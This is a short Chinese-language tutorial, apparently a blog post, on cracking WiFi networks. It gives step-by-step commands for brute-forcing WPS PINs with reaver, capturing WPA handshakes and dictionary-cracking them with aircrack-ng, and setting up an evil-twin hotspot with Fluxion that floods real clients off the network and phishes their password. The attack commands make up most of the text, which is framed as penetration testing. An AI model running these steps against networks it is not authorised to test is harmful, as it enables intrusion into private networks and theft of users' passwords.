1、無線網絡滲透測試目前主要有三種方式,分別是暴力破解PIN碼,跑握手包,搭建偽熱點三種方式,當然還存在其他的方式。
1.1暴力破解
路由器的PIN碼由八位0-9的數字組成,PIN碼由散步風組成,前四位為一組,中間三位 為一組,最后一位單獨為一組。在破解過程中,先破解第一組,第一組破解出來之后再破解第二組,最后一組是前兩組的驗證位,第一組有10000中組合方式,第二組有1000中組合方式。最后一組根據前兩組計算。暴力破解只支持開啟WPS認證的WiFi。
首先開啟網卡為混雜模式。 airmon-ng start wlan0
掃描周圍無線網絡 airodump-ng wlan0mon
可以用 wash -i wlan0mon -C 掃描一下支持PIN破解的無線網絡
最后一步選取一個無線SSID 破解 reaver -i wlan0mon -b 地址 -a -s -vv

2、跑握手包方式破解
提前需要搜集信息構造一個足夠大信息的字典,這個在之前的博客中我已經寫過。簡述
混雜模式 airmon-ng start wlan0
掃描 airodump-ng waln0mon
抓包 airodump-ng -c 4 --bssid XX:XX:XX:XX(MAC地址) -w /root wlan0mon
字典破解 aircrack-ng -w /usr/share/wordlists/zd.txt /root-02.cap
跑握手包的攻擊方式對硬件要求比較高。
3、搭建偽熱點
住區WiFi的握手包,搭建一個和ESSID相同的偽熱點,通過洪攻擊迫使原來接入到真實的WiFi的客戶端下線,無法連接到互聯網轉而連接沒有密碼的偽熱點,用戶輸入密碼。客戶端輸入的密碼與之前的握手包匹配,成功則可以上網。
但是偽熱點存在明顯的缺陷。真實的WiFi任然存在,用戶端輸入密碼的時候是在網頁中輸入的,這很容易被用戶察覺。
偽熱點使用工具 fluxion kali linux 中需要自己下載 不能使用 apt-get install . 所以使用 git clone https://github.com/FluxionNetwork/fluxion.git 下載
